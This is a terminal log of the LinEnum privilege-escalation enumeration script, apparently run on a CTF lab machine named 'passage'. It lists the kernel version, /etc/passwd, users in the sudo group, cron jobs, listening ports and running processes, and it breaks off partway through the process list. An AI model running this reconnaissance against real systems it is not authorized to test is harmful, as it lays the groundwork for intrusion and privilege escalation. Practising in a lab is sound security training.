paul@passage:~/Templates/.conf$ bash LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Wed Sep 23 00:55:08 PDT 2020                                                                                                                     
                                                                                                                                                 

### SYSTEM ##############################################
[-] Kernel information:
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-45-generic (buildd@lcy01-amd64-027) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10)) #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 219


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS"
NAME="Ubuntu"
VERSION="16.04.6 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.6 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[-] Hostname:
passage


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(paul) gid=1001(paul) groups=1001(paul)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/19   10.10.15.76      Tue Sep 22 23:50:54 -0700 2020
nadav            pts/19   10.10.14.146     Wed Sep 23 00:22:09 -0700 2020
paul             pts/23   10.10.15.158     Wed Sep 23 00:54:17 -0700 2020


[-] Who else is logged on:
 00:55:08 up  3:42,  5 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
nadav    tty7     :0               21:13    3:41m  9.11s  0.12s /sbin/upstart --user
nadav    pts/18   127.0.0.1        22:10    2:42m  0.04s  0.04s -bash
nadav    pts/19   10.10.14.146     00:22   15:15   0.13s  0.13s -bash
paul     pts/20   10.10.14.146     23:55   53:08   0.14s  0.14s -bash
paul     pts/23   10.10.15.158     00:54    4.00s  0.10s  0.00s bash LinEnum.sh


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=108(lightdm) gid=114(lightdm) groups=114(lightdm)
uid=109(whoopsie) gid=117(whoopsie) groups=117(whoopsie)
uid=110(avahi-autoipd) gid=119(avahi-autoipd) groups=119(avahi-autoipd)
uid=111(avahi) gid=120(avahi) groups=120(avahi)
uid=112(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=113(colord) gid=123(colord) groups=123(colord)
uid=114(speech-dispatcher) gid=29(audio) groups=29(audio)
uid=115(hplip) gid=7(lp) groups=7(lp)
uid=116(kernoops) gid=65534(nogroup) groups=65534(nogroup)
uid=117(pulse) gid=124(pulse) groups=124(pulse),29(audio)
uid=118(rtkit) gid=126(rtkit) groups=126(rtkit)
uid=119(saned) gid=127(saned) groups=127(saned),122(scanner)
uid=120(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
uid=1001(paul) gid=1001(paul) groups=1001(paul)
uid=121(sshd) gid=65534(nogroup) groups=65534(nogroup)


[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin


[-] Super user account(s):
root


[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x  4 root  root  4.0K Jul 21 10:43 .
drwxr-xr-x 23 root  root  4.0K Jul 21 10:44 ..
drwxr-x--- 17 nadav nadav 4.0K Sep 22 21:13 nadav
drwxr-x--- 16 paul  paul  4.0K Sep  2 07:18 paul


### ENVIRONMENTAL #######################################
[-] Environment information:
SHELL=/bin/bash
TERM=xterm-256color
SSH_CLIENT=10.10.15.158 47144 22
SSH_TTY=/dev/pts/23
USER=paul
PATH=/home/paul/bin:/home/paul/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
MAIL=/var/mail/paul
QT_QPA_PLATFORMTHEME=appmenu-qt5
PWD=/home/paul/Templates/.conf
LANG=en_US.utf8
HOME=/home/paul
SHLVL=2
LOGNAME=paul
SSH_CONNECTION=10.10.15.158 47144 10.10.10.206 22
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env


ls: cannot access '/home/paul/bin': No such file or directory
ls: cannot access '/home/paul/.local/bin': No such file or directory
[-] Path information:
/home/paul/bin:/home/paul/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
drwxr-xr-x 2 root root  4096 Jul 21 10:43 /bin
drwxr-xr-x 2 root root 12288 Jun 18 10:07 /sbin
drwxr-xr-x 2 root root 53248 Jul 21 10:45 /usr/bin
drwxr-xr-x 2 root root  4096 Feb 26  2019 /usr/games
drwxr-xr-x 2 root root  4096 Feb 26  2019 /usr/local/bin
drwxr-xr-x 2 root root  4096 Feb 26  2019 /usr/local/sbin
drwxr-xr-x 2 root root 12288 Jul 21 10:44 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK           022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Sep 22 23:50 /etc/crontab

/etc/cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jul 21 10:44 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rw-r--r--   1 root root   244 Dec 28  2014 anacron
-rw-r--r--   1 root root   670 Mar  1  2016 php
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rw-r--r--   1 root root   190 Jun 18 10:05 popularity-contest

/etc/cron.daily:
total 76
drwxr-xr-x   2 root root  4096 Jul 21 10:44 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rwxr-xr-x   1 root root   311 Dec 28  2014 0anacron
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root  1474 Oct  9  2018 apt-compat
-rwxr-xr-x   1 root root   355 May 22  2012 bsdmainutils
-rwxr-xr-x   1 root root   384 Oct  5  2014 cracklib-runtime
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  5  2015 logrotate
-rwxr-xr-x   1 root root  1293 Nov  6  2015 man-db
-rwxr-xr-x   1 root root   435 Nov 17  2014 mlocate
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root  3449 Feb 26  2016 popularity-contest
-rwxr-xr-x   1 root root   214 Dec  7  2018 update-notifier-common
-rwxr-xr-x   1 root root  1046 May 19  2016 upstart

/etc/cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Feb 26  2019 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 24
drwxr-xr-x   2 root root  4096 Feb 26  2019 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rwxr-xr-x   1 root root   313 Dec 28  2014 0anacron
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 36
drwxr-xr-x   2 root root  4096 Feb 26  2019 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rwxr-xr-x   1 root root   312 Dec 28  2014 0anacron
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root   771 Nov  6  2015 man-db
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   211 Dec  7  2018 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 Dec 28  2014 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron

# See anacron(8) and anacrontab(5) for details.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root

# These replace cron's entries
1       5       cron.daily      run-parts --report /etc/cron.daily
7       10      cron.weekly     run-parts --report /etc/cron.weekly
@monthly        15      cron.monthly    run-parts --report /etc/cron.monthly


[-] When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 Jun 18 10:06 .
drwxr-xr-x 7 root root 4096 Feb 26  2019 ..
-rw------- 1 root root    9 Sep 22 21:18 cron.daily
-rw------- 1 root root    9 Aug 24 06:33 cron.monthly
-rw------- 1 root root    9 Sep 22 21:23 cron.weekly


[-] Systemd timers:
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Wed 2020-09-23 06:20:27 PDT  5h 25min left Tue 2020-09-22 21:13:12 PDT  3h 42min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Wed 2020-09-23 11:49:58 PDT  10h left      Tue 2020-09-22 21:13:12 PDT  3h 42min ago apt-daily.timer              apt-daily.service
Wed 2020-09-23 21:28:18 PDT  20h left      Tue 2020-09-22 21:28:18 PDT  3h 26min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:76:a6  
          inet addr:10.10.10.206  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:76a6/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:76a6/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:159522 errors:0 dropped:264 overruns:0 frame:0
          TX packets:138216 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:15043525 (15.0 MB)  TX bytes:16102687 (16.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:70851 errors:0 dropped:0 overruns:0 frame:0
          TX packets:70851 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5253236 (5.2 MB)  TX bytes:5253236 (5.2 MB)


[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:30:b0 [ether] on ens160


[-] Nameserver(s):
nameserver 8.8.8.8,8.8.4.4


[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens160


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 ::1:631                 :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:39406           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:631             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -               
udp6       0      0 :::56123                :::*                                -               
udp6       0      0 :::5353                 :::*                                -               


### SERVICES #############################################
[-] Running processes:
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.1 119972  6128 ?        Ss   Sep22   0:02 /sbin/init auto noprompt
root          2  0.0  0.0      0     0 ?        S    Sep22   0:00 [kthreadd]
root          4  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kworker/0:0H]
root          6  0.0  0.0      0     0 ?        I<   Sep22   0:00 [mm_percpu_wq]
root          7  0.0  0.0      0     0 ?        S    Sep22   0:00 [ksoftirqd/0]
root          8  0.0  0.0      0     0 ?        I    Sep22   0:02 [rcu_sched]
root          9  0.0  0.0      0     0 ?        I    Sep22   0:00 [rcu_bh]
root         10  0.0  0.0      0     0 ?        S    Sep22   0:00 [migration/0]
root         11  0.0  0.0      0     0 ?        S    Sep22   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    Sep22   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    Sep22   0:00 [cpuhp/1]
root         14  0.0  0.0      0     0 ?        S    Sep22   0:00 [watchdog/1]
root         15  0.0  0.0      0     0 ?        S    Sep22   0:00 [migration/1]
root         16  0.0  0.0      0     0 ?        S    Sep22   0:00 [ksoftirqd/1]
root         18  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kworker/1:0H]
root         19  0.0  0.0      0     0 ?        S    Sep22   0:00 [kdevtmpfs]
root         20  0.0  0.0      0     0 ?        I<   Sep22   0:00 [netns]
root         21  0.0  0.0      0     0 ?        S    Sep22   0:00 [rcu_tasks_kthre]
root         22  0.0  0.0      0     0 ?        S    Sep22   0:00 [kauditd]
root         24  0.0  0.0      0     0 ?        S    Sep22   0:00 [khungtaskd]
root         25  0.0  0.0      0     0 ?        S    Sep22   0:00 [oom_reaper]
root         26  0.0  0.0      0     0 ?        I<   Sep22   0:00 [writeback]
root         27  0.0  0.0      0     0 ?        S    Sep22   0:00 [kcompactd0]
root         28  0.0  0.0      0     0 ?        SN   Sep22   0:00 [ksmd]
root         29  0.0  0.0      0     0 ?        SN   Sep22   0:00 [khugepaged]
root         30  0.0  0.0      0     0 ?        I<   Sep22   0:00 [crypto]
root         31  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kintegrityd]
root         32  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kblockd]
root         33  0.0  0.0      0     0 ?        I<   Sep22   0:00 [ata_sff]
root         34  0.0  0.0      0     0 ?        I<   Sep22   0:00 [md]
root         35  0.0  0.0      0     0 ?        I<   Sep22   0:00 [edac-poller]
root         36  0.0  0.0      0     0 ?        I<   Sep22   0:00 [devfreq_wq]
root         37  0.0  0.0      0     0 ?        I<   Sep22   0:00 [watchdogd]
root         41  0.0  0.0      0     0 ?        S    Sep22   0:00 [kswapd0]
root         42  0.0  0.0      0     0 ?        S    Sep22   0:00 [ecryptfs-kthrea]
root         84  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kthrotld]
root         85  0.0  0.0      0     0 ?        I<   Sep22   0:00 [acpi_thermal_pm]
root         86  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_0]
root         87  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_0]
root         88  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_1]
root         89  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_1]
root         95  0.0  0.0      0     0 ?        I<   Sep22   0:00 [ipv6_addrconf]
root        104  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kstrp]
root        121  0.0  0.0      0     0 ?        I<   Sep22   0:00 [charger_manager]
root        172  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_2]
root        173  0.0  0.0      0     0 ?        I<   Sep22   0:00 [mpt_poll_0]
root        174  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_2]
root        175  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_3]
root        176  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_3]
root        177  0.0  0.0      0     0 ?        I<   Sep22   0:00 [mpt/0]
root        178  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_4]
root        179  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_4]
root        180  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_5]
root        181  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_5]
root        182  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_6]
root        183  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_6]
root        184  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_7]
root        185  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_7]
root        186  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_8]
root        187  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_8]
root        188  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_9]
root        189  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_9]
root        190  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_10]
root        191  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_10]
root        192  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_11]
root        193  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_11]
root        194  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_12]
root        195  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_12]
root        196  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_13]
root        197  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_13]
root        198  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_14]
root        199  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_14]
root        200  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_15]
root        201  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_15]
root        202  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_16]
root        203  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_16]
root        204  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_17]
root        205  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_17]
root        206  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_18]
root        207  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_18]
root        208  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_19]
root        209  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_19]
root        210  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_20]
root        211  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_20]
root        212  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_21]
root        213  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_21]
root        214  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_22]
root        215  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_22]
root        216  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_23]
root        217  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_23]
root        218  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_24]
root        219  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_24]
root        220  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_25]
root        221  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_25]
root        222  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_26]
root        223  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_26]
root        224  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_27]
root        225  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_27]
root        226  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_28]
root        227  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_28]
root        228  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_29]
root        229  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_29]
root        230  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_30]
root        231  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_30]
root        232  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_31]
root        233  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_31]
root        256  0.0  0.0      0     0 ?        S    Sep22   0:00 [scsi_eh_32]
root        257  0.0  0.0      0     0 ?        I<   Sep22   0:00 [scsi_tmf_32]
root        258  0.0  0.0      0     0 ?        I<   Sep22   0:00 [ttm_swap]
root        259  0.0  0.0      0     0 ?        S    Sep22   0:00 [irq/16-vmwgfx]
root        261  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kworker/0:1H]
root        262  0.0  0.0      0     0 ?        I<   Sep22   0:00 [kworker/1:1H]
root        284  0.0  0.0      0     0 ?        S    Sep22   0:00 [jbd2/sda1-8]
root        285  0.0  0.0      0     0 ?        I<   Sep22   0:00 [ext4-rsv-conver]
root        323  0.0  0.1  32228  4356 ?        Ss   Sep22   0:00 /lib/systemd/systemd-journald
root        329  0.0  0.0      0     0 ?        I    Sep22   0:00 [kworker/1:4]
root        340  0.0  0.0      0     0 ?        I    Sep22   0:00 [kworker/0:4]
root        346  0.0  0.1  45736  4472 ?        Ss   Sep22   0:00 /lib/systemd/systemd-udevd
root        404  0.0  0.0 158624   320 ?        Ssl  Sep22   0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid
root        438  0.0  0.2 205996 10904 ?        Ssl  Sep22   0:09 /usr/bin/vmtoolsd
systemd+    496  0.0  0.0 102384  2464 ?        Ssl  Sep22   0:01 /lib/systemd/systemd-timesyncd
root        594  0.0  0.0   4396  1284 ?        Ss   Sep22   0:00 /usr/sbin/acpid
root        602  0.0  0.0  36076  3024 ?        Ss   Sep22   0:00 /usr/sbin/cron -f
syslog      603  0.0  0.0 256392  3292 ?        Ssl  Sep22   0:00 /usr/sbin/rsyslogd -n
root        604  0.0  0.2  85440  9060 ?        Ss   Sep22   0:00 /usr/bin/VGAuthService
avahi       605  0.0  0.0  44908  3608 ?        Ss   Sep22   0:00 avahi-daemon: running [passage.local]
root        606  0.0  0.2 298448  8536 ?        Ssl  Sep22   0:00 /usr/lib/accountsservice/accounts-daemon
avahi       607  0.0  0.0  44784   332 ?        S    Sep22   0:00 avahi-daemon: chroot helper
message+    615  0.0  0.1  44196  5004 ?        Ss   Sep22   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root        648  0.0  0.4 388844 16536 ?        Ssl  Sep22   0:00 /usr/sbin/NetworkManager --no-daemon
root        649  0.0  0.0  28684  3228 ?        Ss   Sep22   0:00 /lib/systemd/systemd-logind
root        716  0.0  0.0  19616  2048 ?        Ss   Sep22   0:01 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root        731  0.0  0.2 294232 10024 ?        Ssl  Sep22   0:00 /usr/lib/policykit-1/polkitd --no-debug
root        772  0.0  0.0  23004  1812 tty1     Ss+  Sep22   0:00 /sbin/agetty --noclear tty1 linux
root        818  0.0  0.2 292164  8200 ?        Ssl  Sep22   0:00 /usr/sbin/lightdm
root        870  0.0  1.4 374920 57452 tty7     Ssl+ Sep22   0:09 /usr/lib/xorg/Xorg -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
root        921  0.0  0.1 228240  6324 ?        Sl   Sep22   0:00 lightdm --session-child 12 15
nadav       926  0.0  0.1  45280  4740 ?        Ss   Sep22   0:00 /lib/systemd/systemd --user
nadav       927  0.0  0.0  63588  2168 ?        S    Sep22   0:00 (sd-pam)
nadav       930  0.0  0.1  53536  4612 ?        Ss   Sep22   0:00 /sbin/upstart --user
nadav      1005  0.0  0.0  39928   280 ?        S    Sep22   0:00 upstart-udev-bridge --daemon --user
nadav      1017  0.0  0.0  43592  3936 ?        Ss   Sep22   0:00 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-8LNoCVony0
nadav      1029  0.0  0.2  93412  8832 ?        Ss   Sep22   0:00 /usr/lib/x86_64-linux-gnu/hud/window-stack-bridge
